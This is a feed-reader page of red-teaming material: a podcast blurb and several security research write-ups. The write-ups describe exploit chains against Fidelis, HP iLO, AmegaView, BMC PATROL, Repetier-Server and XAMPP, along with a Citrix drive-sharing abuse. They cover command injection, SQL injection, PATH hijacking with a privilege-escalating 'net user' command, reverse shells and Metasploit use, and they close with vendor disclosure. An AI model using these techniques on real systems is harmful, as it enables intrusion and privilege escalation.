Reading view

There are new articles available, click to refresh the page.

Red teaming: The fun, and the fundamentals | Cyber Work Live

Learn what it’s like to do good by being bad. The idea of breaking into a company, by hook or by crook, attracts all sorts of would-be secret agents. But what is red teaming really like as a job? What are the parameters, what are the day-to-day realities and, most importantly, what is hands-off in a line of work that bills itself as being beyond rules?

Join a panel of past Cyber Work Podcast guests:
– Amyn Gilani, Chief Growth Officer, Countercraft
– Curtis Brazzell, Managing Security Consultant, GuidePoint Security

Our panel of experts have worked with red teaming from a variety of positions and will answer your questions about getting started, building your skills and avoiding common mistakes.

0:00 - Intro
2:34 - Favorite red team experiences
7:57 - How to begin a cybersecurity career
14:42 - Ethical hacking vs pentesting
18:29 - How to become an ethical hacker
23:32 - Qualities needed for red teaming role
29:20 - Gain hands-on red teaming experience
33:02 - Supplier red team assessments
37:00 - Pentesting variety
46:22 - Becoming a better pentester
52:12 - Red team interview tips
56:00 - Job hunt tips
1:01:18 - Sponsoring an application
1:02:18 - Outro

This episode was recorded live on June 23, 2021. Want to join the next Cyber Work Live and get your career questions answered? See upcoming events here: https://www.infosecinstitute.com/events/

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Operation Eagle Eye

This article is in no way affiliated, sponsored, or endorsed with/by Fidelis Cybersecurity. All graphics are being displayed under fair use for the purposes of this article.

Operation Eagle Eye

Who remembers that movie about 15 years ago called Eagle Eye? A supercomputer has access to massive amounts of data, introduce AI, things go to crap. Reflecting back on that movie, I find myself more interested in what a hacker could actually do with that kind of access rather than the AI bit. This post is about what I did when I got that kind of access on a customer red team engagement.

Being a network defender is hard. Constantly trying to balance usability, security, and privacy. Add too much security and users complain they can’t get their job done. Not enough and you open yourself up to being hacked by every script kiddie on the internet. How does user privacy fit in? Well, as a network defender your first grand idea to protect the network against adversaries might be to implement some form of network traffic inspection. This might have worked 20 years ago, but now most network protocols at least support some form of encryption to protect users’ data from prying eyes. If only there was a way to decrypt it, inspect it, and then encrypt it back… Let’s call it break and inspect.

The graphic above was pulled from an article from the NSA, warning about break and inspect and the risks introduced with its usage (I’d be inclined to heed the warning since the NSA are likely experts on this particular topic). The most obvious risk introduced by break-and-inspect is clearly the device(s) performing the decryption and inspection. Compromise of these devices would provide an attacker access to all unencrypted traffic traversing the network.

All of this lead-up was meant to describe what I can only assume happened with one of our customers. After years of assessments, I noticed one day that all outbound web traffic now had a custom CA certificate when visiting websites. This was a somewhat natural progression as we had been utilizing domain fronting for some time to evade network detection. In response, the network defenders implemented break-and-inspect to identify traffic with  conflicting HTTP Host headers. As a red teamer, my almost immediate thought was, What if we could get access to the break-and-inspect device? Being able to sift through all unencrypted web traffic on a large network would be a goldmine. Operation Eagle Eye began…

Enumeration

After no small amount of time, we identified what we believed to be the device(s) responsible for performing the break-and-inspect operation on the network. We found the BigIP F5 device that was listed as the hostname on the CA certificate, a Fidelis Network CommandPost, and several HP iLO management web services in the same subnet. For those that aren’t familiar, Fidelis Cybersecurity sells a network appliance suite that can perform traffic inspection and modification. They also just so happen to be listed as an accredited product on the NSA recommended National Information Assurance Partnership (NIAP) website so I assume it’s super-secure-hackproof 😉

First order of business was to do some basic enumeration of the devices in this network segment. The F5’s had been recently updated just after a recent RCE bug had been released so I moved on. The Fidelis CommandPost web application presented a CAS based login portal on the root URL as seen below.

After some minimal research on CAS and what appeared to be a rather mature and widely used authentication library, I decided to start brute forcing endpoints with dirsearch on the CommandPost web application. While that was running I moved on to the HP iLOs to see what we had there.

The first thing that jumped out to me about this particular iLO endpoint was that it was HP and the version displayed was under 2.53. This is interesting because a heap-based BOF vulnerability (CVE-2017-12542) was discovered a few years back that can be exploited to create a new privileged user.

Exploitation – HP iLO (CVE-2017-12542)

While my scanner was still enumerating endpoints on the CommandPost,  I went ahead and fired up the iLO exploit to confirm whether or not the target was actually exploitable. Sure enough, I was able to create a new admin user and login.

We now have privileged access to an iLO web management portal of some unknown web server. Outside of getting some server statistics and being able to turn the server on and off, what can we actually do that’s useful from an attacker’s perspective? Well for one we can utilize the remote console feature. HP iLOs actually have two ways to do this, one via Java web start from the web interface and one over SSH (which shares the credentials for the web interface).

Loading up the remote console via Java for this iLO reveals that this server is actually a Fidelis Direct Sensor appliance. Access to the remote console in itself is not super useful since you still have to have credentials to login to the server. However, when you bring up the Java web start remote console you’ll notice a menu that says “Virtual Drives”. What this menu allows you to do is to remotely mount an ISO of your choosing.

The ability to mount a custom ISO remotely introduces a possible avenue for code execution. If the target server does not have a BIOS password and doesn’t utilize full disk encryption, we should be able to boot to an ISO we supply remotely and gain access to the server’s file system. This technique definitely isn’t subtle as we have to turn off the server, but maybe the system owner won’t notice if the outage is brief 🙂

If you are reading this there’s a good chance you’ll be attempting to pull this off through some sort of proxy/C2 comms mid-operation rather than physically sitting at a system on the same network. This makes the choice of ISO critical since network bandwidth is limited. A live CD image that is as small as possible is ideal. I originally tried a 30MB TinyCore linux but eventually landed on the 300 MB Puppy Linux since it comes with a lot more features out-of-the-box. Once the OS loaded up, I mounted the filesystem and confirmed access to critical files.

Since the device had SSH enabled, I decided the easiest mechanism for compromise would be to simply add a SSH public key to the root user’s authorized key file. The “sshd_config” also needed to be updated to allow root login and enable public key authentication.

Exploitation – Unauthenticated Remote Command Injection (CVE-2021-35047)

After gaining initial access to the Fidelis Direct sensor appliance via SSH, I began poking around at the services hosted on the device and investigating what other systems it was communicating with. One of the first things I noticed was lots of connections back to the Fidelis CommandPost appliance on port 5556 from a rconfigc process. I also noticed a rconfigd process listening on the sensor, my assumption was this was some kind of peer-to-peer client/server setup.

Analyzing the rconfigc/rconfigd binaries revealed they were a custom remote script execution framework. The framework consisted of a simple TLS-based client/server application backed mostly by Perl scripts at varying privilege levels, utilizing hard-coded authentication. I reviewed a couple of these scripts and came across the following code snippet.

If you haven’t spotted the bug here, those back ticks in Perl mean to execute the command in the background. Since there are no checks sanitizing the incoming input for the user variable, additional commands can be executed by simply adding a single quote and a semicolon. It appears another perk to this particular command is that it is being run as root so we have automatic privilege escalation. I decided to test this remotely on the Fidelis CommandPost to confirm it actually worked.

Exploitation – Unauthenticated Remote SQL injection (CVE-2021-35048)

Circling back around to the Fidelis CommandPost web application, my dirsearch brute forcing had revealed some interesting endpoints worth investigating. While the majority required authentication, I found two that accepted XML that did not. After trying several different payloads, I managed to get a SQL error returned in the output from one of the requests.

Exploitation – Insecure Credential Storage (CVE-2021-35050)

Using the SQL injection vulnerability identified above, I proceeded to dump the CommandPost database. My goal was to find a way to authenticate to the web application. What I found was a table that stored entries referred to as UIDs. These hex encoded strings turned out to be a product of a reversible encryption mechanism over a string created by concatenating a username and password. Decrypting this value would return credentials that could then be used to login to the Fidelis web application.

Exploitation – Authenticated Remote Command Injection (CVE-2021-35049)

With decrypted root credentials from the database, I authenticated to the web application and began searching for new vulnerabilities in the expanded scope. After a little bit of fuzzing, and help from my previous access, I identified a command injection vulnerability that could be triggered from the web application.

Chaining this vulnerability with each of the previous bugs I was able to create an exploit that could execute root level commands across any managed Fidelis device from an unauthenticated CommandPost web session.

The DATA

So here we are, root level access to a suite of tools that captures and modifies network traffic across an enterprise. It was now time to switch gears and begin investigating what functionality these devices provided and how it could be abused by an attacker (post-compromise risk assessment). After navigating through the CommandPost web application endpoints and performing some minimal system enumeration on the devices, I felt like I had a handle on how the systems work together. There are 3 device types, CommandPost, Sensors, & Collectors. The Sensors collect, inspect, and modify traffic. The Collectors store the data, and the CommandPost provides the web interface for managing the devices.

Given the role of each device, I think the most interesting target to an attacker would have to be a Sensor. If a Sensor can intercept (and possibly modify) traffic in transit, an attacker could leverage it to take control of the network. To confirm this theory, I logged in to a Sensor and began searching for the software and services needed to do this. I started by trying to identify the network interface(s) that the data would be traversing. To my surprise, the only interface that showed as being “up” was the IP address I logged in to. Time to RTFM.

A picture is worth a 1000 words. Based on the figures from the manual shown above, my guess is that the traffic is likely traversing one of the higher numbered interfaces. Now I just have to figure out why they aren’t visible to the root user. After searching through the logs, I found the following clue.

It appears a custom driver is being loaded to manage the interfaces responsible for the network traffic monitoring. Since the base OS is CentOS, it must be mounting them in some kind of security container that is restricting access to the devices which is why I can’t see it. After digging into the driver and some of the processes associated with it, I found that the software uses libpcap and a ring buffer in file-backed memory to intercept network traffic to be inspected/modified. This means to access all of the traffic flowing through the device all we have to do is read the files in the ring buffer and parse the raw network packets. Running the script for just a short time confirms our theory. We quickly notice the usual authentication flows for major websites like Microsoft 0365, Gmail, and even stock trading platforms. To put it plainly, compromise of a Fidelis sensor means an attacker would have unfettered access to all of the unencrypted credentials, PII, and sensitive data exiting the monitored network.

Given the impact of our discovery and what was possible post compromise on these devices, we wrapped up our assessment and immediately reached-out to the customer and the vendor to begin the disclosure process.

Vendor Disclosure & Patch

We are happy to report that the disclosure process with the vendor went smoothly and they worked with us to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Fidelis Network & Deception appliances to update to the latest version immediately.

MesaLabs AmegaView: Information Disclosure to RCE

Amega Login Page

This article is in no way affiliated, sponsored, or endorsed with/by MesaLabs. All graphics are being displayed under fair use for the purposes of this article.

During a recent assessment, multiple vulnerabilities of varied bug types were discovered in the MesaLabs AmegaView Continous Monitoring System, including command injection (CVE-2021-27447, CVE-2021-27449), improper authentication (CVE-2021-27451), authentication bypass (CVE-2021-27453), and privilege escalation (CVE-2021-27445).  In this blog post, we will describe each of the vulnerabilities and how they were discovered.

Recon

While operating we often encounter devices that make up what we colloquially refer to as the “internet of things”, or simply IoT.  These are various network-enabled devices outside of the usual workstation, server, switches, routers, and printers.  IoT devices are often overlooked by network defenders since they often come with custom applications and are more difficult to adequately monitor.  As, red teamers we pay particular attention to these systems because they can provide reliable persistence on the network and are generally less secure. 

The first thing that caught my eye about the AmegaView login page was it required a passkey for authentication rather than the usual username and password.  My initial inclination was to gather more information about the passkey to determine if I could brute force it.  So I started where we all do, I checked the web page source.

Amega Log In Page
Login Page Source

The source code revealed a couple of details about the passkey.  The “size” and “max length” of the password field are set to 10.  We would still need more information to realistically brute force the passkey as 10 characters is too long.  However, the source code disclosed two more crucial pieces of information, the existence of the “/www” directory and the “/index.cgi?J=TIME_EDIT” endpoint.

www directory

Navigating to the “/www” directory in a web browser produces a directory listing which includes two perl files, among others.  We also find we can navigate to /index.cgi?J=TIME_EDIT without authentication.

The perl file “amegalib.pl” divulges quite a bit of information.  It defines how the passkey is generated,  and contains a function that executes privileged OS commands that is reachable from the “/index.cgi?J=TIME_EDIT” endpoint.  It also details the mechanism for authentication which includes two hardcoded cookie values, one for regular users and one for “super” users.

Exploitation

With so many vulns, where do we begin? First, I took the function that generates the passcode and simply ran it. The perl script produces what is typically a 4-6 digit number that is loosely based on the current time of the system. Using this passkey we can log into the system as a “super” user. Once logged in, the options available to a “super” user include the ability to upload new firmware, change certain system options, and the ability to run a “ping-out” test.

Super User Logged In

Clicking on the link to the “Ping-Out Test” brings us to a page that seems right out of a CTF.  We are presented with an input field that expects an IP address to ping.  Entering a IP address, we see that the server seems to be running the ping command 5 times and printing the output.  We quickly discover that arbitrary commands can be appended to the IP address using a pipe “|” character to give us command execution.

With proven command execution, the next step was to spawn a netcat reverse shell and began enumerating the file system in search of more vulnerabilities.

Privilege Escalation

Having discovered a way to execute commands as an unprivileged user, the next goal was to try to find a way to escalate to root on the underlying system.  We noticed a promising function in the “amegalib.pl” file called “run_SUcommand”.  Since the current user had the ability to write files to the web root, I just created a CGI file that called the “run_SUcommand” function from the “amegalib.pl” file. After confirming that worked, I used netcat again to spawn a shell as root.  After looking through the source code, I found this function is reachable as an authenticated user from the previously mentioned endpoint “/index.cgi?J=TIME_EDIT”. The vulnerable code is shown below.

The “set_datetime” function displayed above concatenates data supplied by the user and then passes it to the “run_SUcommand” function. Arbitrary code execution as the root user can be achieved by sending a specially crafted time update request with the desired shell commands as shown below.

Wrap Up

This product will reach its end of life at the end of December 2021.  MesaLabs has stated that they do not plan to release a patch, so system owners beware!

Hacking Citrix Storefront Users

This article is in no way affiliated, sponsored, or endorsed with/by Citrix Systems, Inc. All graphics are being displayed under fair use for the purposes of this article.

Hacking Citrix Storefront Users

With the substantial shift from traditional work environments to remote/telework capable infrastructures due to COVID-19, products like Citrix Storefront have seen a significant boost in deployment and usage. Due to this recent shift, we thought we’d present a subtle configuration point in Citrix Receiver that can be exploited for lateral movement across disjoint networks. More plainly, this (mis)configuration can allow an attacker that has compromised the virtual Citrix Storefront environment to compromise the systems of the users that connect to it using Citrix Receiver.

Oopsie

For those that aren’t familiar with Citrix Storefront, it is made up of multiple components. It is often associated with other Citrix products like Citrix Receiver\Workspace, XenApp, and XenDesktop. An oversimplification of what it provides is the ability for users to remotely access shared virtual machines or virtual applications.

To be able to remote in to these virtual environments, a user has to download and install Citrix Workspace (formerly Receiver). Upon install, the user is greeted with the following popup and the choice is stored in the registry for that user.

What we’ve found is that more often than not, end-users as well as group policy managed systems have this configuration set to “Permit All Access”. Likely because it isn’t very clear what you are permitting all access to, and whether it is necessary for proper usage of the application. I for one can admit to having clicked “Permit All Access” prior to researching what this setting actually means.

So what exactly does this setting do? It mounts a share to the current user’s drives on the remote Citrix virtual machine. If the user selects “Permit All Access”, it enables the movement of files from the remote system to the user’s shared drive.

Ok, so a user can copy files from the remote system, why is this a security issue? This is a security issue because there is now no security boundary between the user’s system and the remote Citrix environment. If the remote Citrix virtual machine is compromised, an attacker can freely write files to the connecting user’s shared drive without authentication.

Giving an attacker the ability to write files on your computer doesn’t sound that bad right? Especially if you are a low privileged user on the system. What could they possibly do with that? They could overwrite binaries that are executed by the user or operating system. A simple example of trivial code execution on Windows 10 is overwriting the OneDriveStandaloneUpdater binary that is located in the user’s AppData directory. This binary is called daily as a scheduled task.

Recommendations

Use the principle of least privilege when using Citrix Workspace to remote into a shared Citrix virtual environments. By default set the file security permissions for Citrix Workspace to “No Access” and only change it temporarily when it is necessary to copy files to or from the remote virtual environment. The following Citrix article explains how to change these settings in the registry.  https://support.citrix.com/article/CTX133565

BMC Patrol Agent – Domain User to Domain Admin – Part 2

**Securifera is in no way affiliated, sponsored, or endorsed with/by BMC. All graphics produced are in no way associated with BMC or it’s products and were created solely for this blog post. All uses of the terms BMC, PATROL, and any other BMC product trademarks is intended only for identification purposes and is to be considered fair use throughout this commentary. Securifera is offering no competing products or services with the BMC products being referenced.

Recap

A little over 2 years ago I wrote a blog post about a red team engagement I participated in for a customer that utilized BMC PATROL for remote administration on the network. The assessment culminated with our team obtaining domain admin privileges on the network by exploiting a critical vulnerability in the BMC PATROL software. After coordinating with the vendor we provided several mitigations to the customer. The vendor characterized the issue as a misconfiguration and guidance was given to how to better lock down the software. Two years later we executed a retest for the customer and this blog post will describe what we found.

From a red teamers perspective, the BMC PATROL software can be described as a remote administration tool. The vulnerability discovered in the previous assessment allowed an unprivileged domain user to execute commands on any Windows PATROL client as SYSTEM. If this doesn’t seem bad enough, it should be noted that this software was running on each of the customer’s domain controllers.

The proposed mitigation to the vulnerability was a couple of configuration changes that ensured the commands were executed on the client systems under the context of the authenticated user.

A specific PATROL Agent configuration parameter (/AgentSetup/pemCommands_policy = “U” ) can be enabled that ensures the PATROL Agent executes the command with (or using) the PATROL CLI connected user.

reference: https://docs.bmc.com/docs/display/pia100/Setting+the+default+account+for+PEM+commands.

Restricted mode. Only users from Administrators group can connect and perform operations (“/AgentSetup/accessControlList” = “:Administrators/*/CDOPSR”):

reference: https://docs.bmc.com/docs/PATROLAgent/113/security-guidelines-for-the-patrol-agent-766670159.html

Unprivileged Remote Command Execution

Given the results from our previous assessment, as soon as we secured a domain credential I decided to test out PATROL again. I started up the PatrolCli application and tried to send a command to test whether it would be executed as my user or a privileged one. (In the screenshot, the IP shows loopback because I was sending traffic through an SSH port forward)

The output suggested the customer had indeed implemented the mitigations suggested by the vendor. The command was no longer executed with escalated privileges on the target, but as the authenticated user. The next thing to verify was whether the domain implemented authorization checks were in place. To give a little background here, in most Windows Active Directory implementations, users are added to specific groups to define what permissions they have across the domain. Often times these permissions specify which systems a user can login to/execute commands on. This domain was no different in that very stringent access control lists were defined on the domain for each user.

A simple way to test whether or not authorization checks were being performed properly was to attempt to login/execute commands with a user on a remote Windows system using RDP, SMB, or WMI. Next, the same test would be performed using BMC PATROL and see if the results were the same. To add further confidence to my theory, I decided to test against the most locked down system on the domain, the domain controller. Minimal reconnaissance showed the DC only allowed a small group of users remote access and required an RSA token for 2FA. Not surprisingly, I was able to execute commands directly on the domain controller with an unprivileged user that did not have the permissions to login or remotely execute on the system with standard Windows methods.

As this result wasn’t largely unexpected based on my previous research, the next question to answer was whether or not I could do anything meaningful on a domain controller as an unprivileged user that had no defined permissions on the system. The first thing that stood out to me was the absence of a writable user folder since PATROL had undermined the OS’s external access permissions. This meant my file system permissions would be bound to those set for  the “Users”, “Authenticated Users”, and “Everyone” groups. To make things just a little bit harder, I discovered that a policy was in place that only allowed the execution of trusted signed executables.

Escalation of Privilege

With unprivileged remote command execution using PATROL, the next logical step was to try and escalate privileges on the remote system. As a red teamer, the need to escalate privileges for a unprivileged user to SYSTEM occurs pretty often. It is also quite surprising how common it is to find vulnerabilities that can be exploited to escalate privileges in Windows services and scheduled tasks. I spent a fair amount of time hunting for these types of bugs following research by James Forshaw and others several years back.

The first thing I usually check for when I’m looking for Windows privilege escalation bugs is if there are any writable folders defined in the current PATH environmental variable. For such an old and well known misconfiguration, I come across this ALL THE TIME. A writable folder in the PATH is not a guaranteed win. It is one of two requirements for escalating privileges. The second is finding a privileged process that insecurely loads a DLL or executes a binary. When I say insecurely, I am referring to not specifying the absolute path to the resource. When this happens, Windows attempts to locate the binary by searching the folders defined in the PATH variable. If an attacker has the ability to write to a folder in the PATH, they can drop a malicious binary that will be loaded or executed by the privileged process, thus escalating privileges.

Listing the environmental variables with “set” on the target reveals that it does indeed have a custom folder on the root of the drive in the PATH. At a glance I already have a good chance that it is writable because by default any new folder on the root of the drive is writable based on permission inheritance. A quick test confirms it.

With the first requirement for my privilege escalation confirmed, I then moved on to searching for a hijackable DLL or binary. The most common technique is to simply open up Sysinternals ProcessMonitor and begin restarting all the services and scheduled tasks on the system. This isn’t really a practical approach in our situation since one already has to be in a privileged context to be able to restart these processes and you need to be in an interactive session.

What we can do is attempt to model the target system in a test environment and perform this technique in hopes that any vulnerabilities will map to the target. The obvious first privileged service to investigate is BMC PATROL. After loading up process monitor and restarting the PatrolAgent service I add a filter to look for “NO SUCH FILE” and “NAME NOT FOUND” results. Unfortunately I don’t see any relative loading of DLLs. I do see something else interesting though.

What we’re seeing here is the PatrolAgent service executing “cmd /c bootime” whenever it is started. Since an absolute path is not specified, the operating system attempts to locate the application using the PATH. An added bonus is that the developers didn’t even bother to add an extension so we aren’t limited to an executable (This will be important later). In order for this to be successful, our writable folder has to be listed earlier in the search order than the actual path of the real bootime binary. Fortunate for me, the target system lists the writable folder first in the PATH search order. To confirm I can actually get execution, I drop a “boottime.bat” file in my test environment and watch as it is successfully selected from a folder in the PATH earlier in the search order.

So that’s it right? Time to start raining shells all over the network? Not quite yet. As most are probably aware, an unprivileged user doesn’t typically have the permissions necessary to restart a service. This means the most certain way to get execution is each time the system reboots. Unfortunately, on a server that could be weeks or longer, especially for a domain controller. Another possibility could be to try and crash the service and hope it is configured to restart. Before I capitulated to these ideas, I decided to research whether the application in its complex, robustness actually provided this feature in some way. A little googling later I came across the following link. Supposedly I could just run the following command from an adjacent system with PATROL and the remote service would restart.

pconfig +RESTART -host

Sure enough, it worked. I didn’t take the time to reverse engineer what other possibilities existed with this new “pconfig” application that apparently had the ability to perform at least some privileged operations, without authentication. I’ll leave that for PART 3 if the opportunity arises.

Combining all of this together, I now had all of the necessary pieces to again, achieve domain admin with only a low privileged domain user using BMC Patrol. I wrote “net user Administrators /add” to C:\Scripts\boottime.bat using PATROL and then executed “pconfig  +RESTART -host to restart the service and add my user to the local administrators group. I chose to go with “boottime.bat” rather than “boottime.exe” because it provided me with privileged command execution while also evading the execution policy that required trusted signed executables. It was almost to good to be true.

Following the assessment, I reached out to BMC to responsibly disclose the binary hijack in the PatrolAgent service. They were quick to reply and issue a patch. The vulnerability is being tracked as CVE-2020-35593.

Recommendations

The main lesson to be learned from this example is to always be cognizant of the security implications each piece of software introduces into your network. In this instance, the customer had invested significant time and resources to lock down their network. It had stringent access controls, group policies, and multiple 2 factor authentication mechanisms (smart card and RSA tokens). Unfortunately however, they also installed a remote administration suite that subverted almost all of these measures. While there are a myriad of third party remote administration tools for IT professionals at their disposal, often times it is much safer to just use the built-in mechanisms supported by the operating system for remote administration. At least this way there is a higher probability that it was designed to properly utilize the authentication and authorization systems in place.

A 3D Printed Shell

A 3D Printed Shell

With 3D printers getting a lot of attention with the COVID-19 pandemic, I thought I’d share a post about an interesting handful of bugs I discovered last year. The bugs were found in a piece of software that is used for remotely managing 3D printers. Chaining these vulnerabilities together enabled me to remotely exploit the Windows server hosting the software with SYSTEM level privileges. Let me introduce “Repetier-Server”, the remote 3D printer management software.

Exploration

Like many of my past targets, I came across this software while performing a network penetration test for a customer. I came across the page above while reviewing screenshots of all of the web servers in scope of the assessment. Having never encountered this software before, I loaded it up in my browser and started checking it out. After exploring some of the application’s features, I googled the application to see if I could find some documentation, or better, download a copy of the software to install. I was happy to find that not only could I download a free version of the software, but they also provided a nice user manual that detailed all of the features.

In scenarios where I can obtain the software, my approach to vulnerability discovery is slightly different than the typical black-box web application. Since I had access to the code, I had the ability to disassemble/decompile the software and directly search for vulnerabilities. With time constraints being a concern, I started with the low hanging fruit and worked towards the more complex vulnerabilities. I reviewed the documentation looking for mechanisms where the software might execute commands against the operating system. Often times, simple web applications are nothing more than a web-based wrapper around a set of shell commands.

I discovered the following blurb in the “Advanced Setup” section of the documentation that describes how a user can define “external” commands that can be executed by the web application.

As I had hoped, the application already had the ability to execute system commands, I just had to find a way to abuse it. The documentation provided the syntax and XML structure for the external command config file.

The video below demonstrates the steps necessary to define an external command, load it into the application, and execute it. These steps would become requirements for the exploit primitives I needed to discover in order to achieve remote code execution.

Discovery

Now that I had a feature to target, external commands, I needed to identify what the technical requirements were to reach that function. The first and primary goal was to find a way to write a file to disk from the web application. The second goal was ensuring I had sufficient control over the content of the file to pass any XML parsing checks. The remaining goals were nice to haves: a way to trigger a reboot/service restart, ability to read external command output, and file system navigation for debugging.

I started up Sysinternals Process Monitor to help me identify the different ways I could induce a file write from the web application. I then added a filter to only display file write operations by the RepetierServer.exe process.

Bug: 1  – File Upload & Download – Arbitrary Content – Constant PATH 

The first file write opportunity I found was in the custom watermark upload feature in the “Global Settings – > Timelapse” menu. Process Monitor shows the RepetierServer process writes the file to “C:\ProgramData\Repetier-Server\database\watermark.png”. I had to tweak my process monitor filters because the file first gets written to a temp file called upload1.bin and then renamed to watermark.png.

If you attempt to upload a file with an extension other than “.png” you will get a “Wrong file format” error. I opened up Burp to take a look at the HTTP request and see if modifying it in transit allowed us to bypass this check. Often times developers make the mistake of only performing client side security checks in Javascript, which can be easily bypassed by sending the request directly.

Manually manipulating each of the fields, I found a couple interesting results. It appears the only security check being performed server-side is a file extension check on the filename field in the request form. This check isn’t really necessary since the destination file on disk is constant. However, I did find that the file content can be whatever I want. The web application also provided another endpoint that allows for the retrieval of the watermark file. While this isn’t immediately useful, it means if I can write arbitrary data to the watermark file location, I can read it back remotely. I’ll save this away for later in case we need it.

Bug: 2  – File Upload – Uncontrolled Content – Partially Controlled PATH (Directory Traversal), Controlled File Name, Uncontrolled Extension  

Continuing with my mission of identifying file upload possibilities, I started to investigate the flow for adding a new printer to be managed by the web application. The printer creation wizard is pretty straightforward. The following video demonstrates how to create a fake printer on a Windows host running in VMware Workstation.

Based on the process monitor output, it appears that when a new printer is created, an XML file named after the printer is created in the “C:\ProgramData\Repetier-Server\configs” directory, as well as a matching directory in the “C:\ProgramData\Repetier-Server\printer” with additional subdirectories and files.

Attempting to identify the request responsible for creating the new printer in Burp proved elusive at first until I figured out that the web application utilizes websockets for much of the communication to the server. After some trial and error I identified the websocket request that creates the printer configuration file on disk.

From here I began modifying the different fields of the request to see what interesting effects might happen. Since the configuration file name mirrored the printer name, the first thing I tried was prepending a directory traversal string to the printer name in the websocket request to see if I could alter the path.   Given my goal of creating an external command configuration file, I named my printer “..\\database\\extcommands”. To my surprise, it worked!!

At this point I could write to the file location necessary to load a external command, getting me substantially closer to full remote code execution. However, I still could not control the file contents. I decided to go ahead and script up a quick POC to reliably exploit the vulnerability and move on.

Bug: 3  – File Upload & Download – Partially Controlled Content – Uncontrolled PATH – Insufficient Validation

Starting from where I left off with the directory traversal bug, I began investigating ways I could try and modify the printer configuration file that I had written as the external configuration file. Luckily for me, the web application provided a feature for downloading the current configuration file or replacing it with a new one.

Coming off the high from my last bug I figured why not just try and use this feature to upload the external command configuration file for the win. Nope… Still more work to do.

Since both files were XML, I began trying different combinations of elements from each configuration file to try and satisfy whatever validation checks were happening. After spending a fair amount of time on this I just decided to open the binary up in IDA Pro and look for myself. Rather than bore you with disassembly and the tedium that followed, I’ll skip right to the end. Given a lack of full validation being performed on each element of the printer configuration file and the external command configuration file, a single XML file could be constructed that passed validation for both by including the necessary elements that were being checked when each file was parsed. This means I was able to use the “Replace Printer Configuration” feature to add an external command to our extcommands.xml file.

Bug: 4  (BONUS) – Remote File System Enumeration

Digging further into the web application, I also discovered an interesting “feature” located in the “Global Settings – > Folders” menu. The web application allows a user to add a registered folder to import files for 3D printing. The first thing I noticed about this feature is that it is not constrained to a particular folder and can be used to navigate the folder structure of the entire target file system. This can be achieved by simply clicking the “Browse” button.

Since this feature references the ability to print from locations on disk, I decided to investigate further by creating a Folder at C:\ and seeing if I could find where the Folder is referenced. After creating a printer and selecting it from the main page, a menu can be selected that looks like a triangle in the top right of the page.

When I select the Folder the following window is displayed. If I deselect the “Filter Wrong File Types” checkbox, the dialog basically becomes a remote file browser for the system. The great thing about this feature from an attacker’s perspective is it gives me the ability to confirm exploitation of the directory traversal file upload vulnerability identified earlier.

Exploitation

Using the vulnerabilities discovered above, I mapped out the different stages of the exploit chain that needed to be implemented. The only piece that I lacked for the exploit chain was the ability to remotely restart the ReptierServer service or the system. Since the target system was a user’s workstation, I would just have to hope that they would reboot the system at some point in the near future. This also meant that replacing the external command would be impractical since it required a service restart each time. I would need to ensure that whatever external command I created was reliable and flexible enough to support the execution of subsequent system commands. Fortunately for me, I had just the bug for this. I could use the watermark file upload & download vulnerability as a medium for storing the commands I wanted to execute, and the resulting output. The following external command achieves this goal by reading from the watermark file, executing its contents, and then piping the output to the watermark file.

Copy to Clipboard

Putting this all together, I came up with the following exploit flow that needed to be implemented.

I implemented each step in this python POC. The following video demonstrates it in action against my test RepetierServer installation.

After successfully testing the POC, I executed it against the target server on the customer’s network. It took ~3 days until the system was rebooted, but I was ultimately able to remotely compromise the target. When the penetration test was complete, I reached out to the vendor to report the vulnerabilities and they were quick to patch the software and release an update. I also coordinated the findings with MITRE and two CVEs were issued, CVE-2019-14450 & CVE-2019-14451.

403 to RCE in XAMPP

403 to RCE in XAMPP

Some of the best advice I was ever given at how to become more successful at vulnerability discovery is to always try and dig a little deeper. Whether you are a penetration tester, red teamer, or bug bounty hunter, this advice has always proven true.  Far too often it is easy to become reliant on the latest “hacker” toolsets and other peoples exploits or research. When those fail, we often just move on to the next low hanging fruit rather than digging in.

On a recent assessment, I was performing my usual network recon and came across the following webpage while reviewing the website screenshots I had taken.

The page displayed a list of significantly outdated software that was running behind this webserver. Having installed XAMPP before, I was also familiar with the very manual and tedious process of updating each of the embedded services that are bundled with it. My first step was to try and enumerate any web applications that were being hosted on the webserver. Right now my tool of choice is dirsearch, mainly just because I’ve gotten used to its syntax and haven’t found a need to find something better.

After having zero success enumerating any endpoints on the webserver, I decided to setup my own XAMPP installation mirroring the target system. The download page for XAMPP can be found here. It has versions dating all the way back to 2003. From the 403 error page we can piece together what we need to download the right version of XAMPP. We know it’s a Windows install (Win32). If we lookup the release date for the listed PHP version we can see it was released in 2011.

Based on the release date we can reliably narrow it down to a couple of candidate XAMPP  installations.

After installing the software, I navigated to the apache configuration file directory to see what files were being served by default. The default configuration is pretty standard with the root directory being served out of C:\xampp\htdocs. What grabbed my attention was the “supplemental configurations” that were included at the bottom of the file.

The main thing to pay attention to in these configuration files is the lines that start with ScriptAlias as they map a directory on disk to one reachable from the web server. There are only two that show up. /cgi-bin/ and /php-cgi/. What is this php-cgi.exe? This seems awful interesting…

After a few searches on google, it seems the php-cgi binary has the ability to execute php code directly. I stumbled across an exploit that lists the version of the target as vulnerable, but it is targeting Linux instead of Windows. Since php is cross platform I can only assume the Windows version is also affected. The exploit also identifies the vulnerability as CVE-2012-1823.

Did I hit the jackpot??? Did XAMPP slide under the radar as being affected by this bug when it was disclosed? With this CVE in hand, I googled a little bit more and found an article by Praetorian that mentions the same php-cgi binary and conveniently includes a Metasploit module for exploiting it. Loading it up into metasploit, I changed the TARGETURI to /php-cgi/php-cgi.exe and let it fly. To my surprise, remote code execution as SYSTEM.

Bugs like this remind me to always keep an eye out for frameworks and software packages that are collections of other software libraries and services. XAMPP is a prime example because it has no built-in update mechanism and requires manual updates. Hopefully examples like this will help encourage others to always dig a little deeper on interesting targets.

Defcon 2020 Red Team Village CTF – Seeding Part 1 & 2

Defcon 2020 Red Team CTF – Seeding Part 1 & 2

